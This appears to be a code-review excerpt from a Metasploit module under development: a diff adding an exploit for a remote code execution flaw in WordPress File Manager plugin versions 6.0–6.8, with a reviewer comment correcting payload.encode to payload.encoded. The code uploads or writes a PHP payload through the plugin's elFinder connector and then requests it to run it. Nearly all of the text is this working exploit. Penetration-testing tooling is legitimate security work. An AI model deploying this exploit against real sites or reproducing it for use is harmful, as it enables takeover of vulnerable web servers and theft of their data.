modules/exploits/multi/http/wp_file_manager_rce.rb

```diff
@@ -0,0 +1,119 @@
+          ],
+        'Platform' => [ 'php' ],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            [ 'WordPress File Manager 6.0-6.8', {} ]
+          ],
+        'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
+        OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])
+      ]
+    )
+  end
+
+  def check
+    begin
+      return CheckCode::Unknown unless wordpress_and_online?
+
+      # check the plugin version from readme
+      check_plugin_version_from_readme('wp-file-manager', nil, 6.0)
+    end
+  end
+
+  def exploit
+    begin
+      # carry out check before the exploit
+      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') unless [CheckCode::Appears].include? check
+      # base path to File Manager plugin
+      file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
+      # filename of the file to be uploaded/created
+      filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
+
+      case datastore['COMMAND']
+      when 'upload'
+        elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
+      when 'mkfile+put'
+        elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
+        elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
+      end
+
+      payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
+      print_status("#{peer} - Payload is at #{payload_uri}")
+      # execute the payload
+      send_request_cgi('uri' => normalize_uri(payload_uri))
+    end
+  end
+
+  # make it easier to switch between "upload" and "mkfile+put" exploit methods
+  def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
+    if opts['payload'] != ''
+      payload = opts['payload']
+    end
+    filename = opts['filename']
+
+    # prep for exploit
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')
+
+    case elfinder_cmd
+    when 'upload'
+      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
+      post_data.add_part(payload.encode, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
+    when 'mkfile'
+      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
+      post_data.add_part(filename, nil, nil, 'form-data; name="name"')
+    when 'put'
+      post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
+      post_data.add_part(payload.encode, nil, nil, 'form-data; name="content"')
+    end
```

Comment:
Use `payload.encoded` instead of `payload.encode`

```suggestion
    case elfinder_cmd
    when 'upload'
      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
      post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
    when 'mkfile'
      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
      post_data.add_part(filename, nil, nil, 'form-data; name="name"')
    when 'put'
      post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
      post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')
    end
```